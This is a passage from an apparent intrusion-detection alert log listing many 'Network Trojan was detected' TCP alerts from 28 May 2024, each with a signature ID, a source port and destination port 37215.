            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.904857
            SID:2835222
            Source Port:46436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.805936
            SID:2835222
            Source Port:53926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048667
            SID:2835222
            Source Port:60212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767322
            SID:2835222
            Source Port:41036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998847
            SID:2829579
            Source Port:46926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767130
            SID:2829579
            Source Port:38016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542548
            SID:2835222
            Source Port:56194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852093
            SID:2835222
            Source Port:45926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778756
            SID:2829579
            Source Port:36096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431491
            SID:2835222
            Source Port:36038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039808
            SID:2829579
            Source Port:48038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572110
            SID:2835222
            Source Port:39200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026920
            SID:2829579
            Source Port:40656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582647
            SID:2829579
            Source Port:51992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.950704
            SID:2829579
            Source Port:51784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612003
            SID:2829579
            Source Port:42972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.058147
            SID:2835222
            Source Port:53748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774004
            SID:2829579
            Source Port:57322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.977112
            SID:2829579
            Source Port:55838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987026
            SID:2829579
            Source Port:41798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871448
            SID:2829579
            Source Port:54392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.367517
            SID:2829579
            Source Port:46086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222036
            SID:2835222
            Source Port:60796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601825
            SID:2835222
            Source Port:40468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870304
            SID:2835222
            Source Port:50828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811940
            SID:2835222
            Source Port:45946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047572
            SID:2835222
            Source Port:58520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290296
            SID:2829579
            Source Port:41838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901385
            SID:2835222
            Source Port:56002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811224
            SID:2829579
            Source Port:38854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872340
            SID:2829579
            Source Port:49444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904441
            SID:2829579
            Source Port:33134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873299
            SID:2835222
            Source Port:33186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999944
            SID:2835222
            Source Port:41334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857537
            SID:2829579
            Source Port:59638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670293
            SID:2835222
            Source Port:60648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278434
            SID:2835222
            Source Port:58986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058408
            SID:2835222
            Source Port:54962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311166
            SID:2835222
            Source Port:53970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491337
            SID:2835222
            Source Port:52954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.992597
            SID:2829579
            Source Port:41702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740446
            SID:2829579
            Source Port:35194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320118
            SID:2835222
            Source Port:53976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.131117
            SID:2829579
            Source Port:35232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842179
            SID:2835222
            Source Port:50806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445145
            SID:2829579
            Source Port:59518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734303
            SID:2835222
            Source Port:47916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547527
            SID:2835222
            Source Port:48540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327190
            SID:2835222
            Source Port:33700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956960
            SID:2835222
            Source Port:49216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862245
            SID:2829579
            Source Port:36854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560048
            SID:2829579
            Source Port:37982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.691636
            SID:2829579
            Source Port:44796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836953
            SID:2835222
            Source Port:35458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936356
            SID:2835222
            Source Port:42892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.383373
            SID:2835222
            Source Port:39308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507034
            SID:2829579
            Source Port:57134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601853
            SID:2829579
            Source Port:34392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767380
            SID:2829579
            Source Port:33280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849783
            SID:2835222
            Source Port:44794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507539
            SID:2835222
            Source Port:55992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767233
            SID:2835222
            Source Port:35192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989681
            SID:2835222
            Source Port:55628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863467
            SID:2835222
            Source Port:36328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310410
            SID:2835222
            Source Port:45282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333729
            SID:2829579
            Source Port:42230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510076
            SID:2835222
            Source Port:44634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560019
            SID:2829579
            Source Port:46438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645655
            SID:2829579
            Source Port:40548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990169
            SID:2829579
            Source Port:59632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.730237
            SID:2835222
            Source Port:60434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871706
            SID:2829579
            Source Port:39062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327343
            SID:2835222
            Source Port:53776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943674
            SID:2829579
            Source Port:60902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811428
            SID:2829579
            Source Port:49016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952466
            SID:2835222
            Source Port:57734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027034
            SID:2829579
            Source Port:42576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028244
            SID:2835222
            Source Port:59752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756042
            SID:2829579
            Source Port:50664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868541
            SID:2835222
            Source Port:49450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434111
            SID:2835222
            Source Port:43542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739039
            SID:2829579
            Source Port:36536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979383
            SID:2829579
            Source Port:52746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000626
            SID:2835222
            Source Port:36890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828997
            SID:2835222
            Source Port:47542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778603
            SID:2835222
            Source Port:52870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879652
            SID:2829579
            Source Port:35534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899701
            SID:2829579
            Source Port:54422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811015
            SID:2829579
            Source Port:43714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963182
            SID:2829579
            Source Port:43564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900433
            SID:2829579
            Source Port:58372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968414
            SID:2835222
            Source Port:37768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746115
            SID:2835222
            Source Port:60884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735404
            SID:2835222
            Source Port:57880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.835867
            SID:2829579
            Source Port:36038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825888
            SID:2835222
            Source Port:39900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432267
            SID:2829579
            Source Port:52170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930345
            SID:2829579
            Source Port:42866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821819
            SID:2835222
            Source Port:52750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865310
            SID:2829579
            Source Port:45712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808326
            SID:2829579
            Source Port:47998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961027
            SID:2829579
            Source Port:50818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778409
            SID:2829579
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.646359
            SID:2829579
            Source Port:39756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860575
            SID:2829579
            Source Port:43650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919247
            SID:2829579
            Source Port:33612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887732
            SID:2829579
            Source Port:51896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527211
            SID:2829579
            Source Port:43748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.597345
            SID:2835222
            Source Port:36500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821481
            SID:2829579
            Source Port:37972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930245
            SID:2829579
            Source Port:39544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904247
            SID:2829579
            Source Port:40282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305444
            SID:2835222
            Source Port:41314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.707053
            SID:2829579
            Source Port:56098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748148
            SID:2829579
            Source Port:32798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.297272
            SID:2835222
            Source Port:59708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919364
            SID:2835222
            Source Port:57444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060045
            SID:2835222
            Source Port:43894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789136
            SID:2835222
            Source Port:43194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459644
            SID:2835222
            Source Port:51974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052945
            SID:2829579
            Source Port:52758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852925
            SID:2835222
            Source Port:45002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930173
            SID:2829579
            Source Port:51564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516557
            SID:2829579
            Source Port:33286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961341
            SID:2829579
            Source Port:47118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755898
            SID:2835222
            Source Port:38216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.021304
            SID:2829579
            Source Port:33830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.328208
            SID:2829579
            Source Port:33264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918811
            SID:2835222
            Source Port:58642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862989
            SID:2835222
            Source Port:34706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743623
            SID:2835222
            Source Port:57748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336489
            SID:2829579
            Source Port:45568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084538
            SID:2829579
            Source Port:53620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870473
            SID:2835222
            Source Port:56116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.463578
            SID:2829579
            Source Port:56238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743605
            SID:2829579
            Source Port:38316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541612
            SID:2835222
            Source Port:45848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728492
            SID:2829579
            Source Port:51272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762450
            SID:2835222
            Source Port:42744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491256
            SID:2829579
            Source Port:54446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924180
            SID:2829579
            Source Port:56806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.013896
            SID:2835222
            Source Port:34590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777078
            SID:2835222
            Source Port:43066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.744257
            SID:2829579
            Source Port:49474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433129
            SID:2835222
            Source Port:36250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.716614
            SID:2835222
            Source Port:39588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046166
            SID:2835222
            Source Port:60752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930200
            SID:2829579
            Source Port:34760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807051
            SID:2829579
            Source Port:44684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817654
            SID:2835222
            Source Port:52054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470750
            SID:2835222
            Source Port:57128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810387
            SID:2829579
            Source Port:36520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446450
            SID:2835222
            Source Port:58908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745193
            SID:2829579
            Source Port:50542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919341
            SID:2829579
            Source Port:39686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923500
            SID:2829579
            Source Port:36904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850356
            SID:2829579
            Source Port:37590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817567
            SID:2835222
            Source Port:50554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873374
            SID:2829579
            Source Port:54652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924885
            SID:2835222
            Source Port:48672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996428
            SID:2829579
            Source Port:57200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543990
            SID:2829579
            Source Port:56350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668829
            SID:2835222
            Source Port:49838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811768
            SID:2829579
            Source Port:50188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887829
            SID:2835222
            Source Port:51916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760098
            SID:2829579
            Source Port:36996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727549
            SID:2829579
            Source Port:41144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066070
            SID:2835222
            Source Port:59890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542624
            SID:2835222
            Source Port:42350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.310233
            SID:2829579
            Source Port:43724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543964
            SID:2829579
            Source Port:42320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.722156
            SID:2829579
            Source Port:53336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872685
            SID:2835222
            Source Port:40416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065250
            SID:2829579
            Source Port:57122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872808
            SID:2829579
            Source Port:48174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851101
            SID:2835222
            Source Port:47082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.994713
            SID:2829579
            Source Port:59190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261341
            SID:2829579
            Source Port:44466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853895
            SID:2829579
            Source Port:43000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862872
            SID:2835222
            Source Port:56414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.033765
            SID:2835222
            Source Port:37014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670447
            SID:2829579
            Source Port:42034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915498
            SID:2829579
            Source Port:56062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.494536
            SID:2829579
            Source Port:45222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067481
            SID:2835222
            Source Port:54498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.632099
            SID:2829579
            Source Port:33474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.788900
            SID:2829579
            Source Port:34288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518975
            SID:2829579
            Source Port:40874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916738
            SID:2829579
            Source Port:34312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804233
            SID:2829579
            Source Port:56974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900645
            SID:2829579
            Source Port:56816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760253
            SID:2835222
            Source Port:55388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936295
            SID:2829579
            Source Port:43324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.855497
            SID:2829579
            Source Port:33170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061491
            SID:2835222
            Source Port:51480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.490844
            SID:2829579
            Source Port:55140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860197
            SID:2835222
            Source Port:54694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
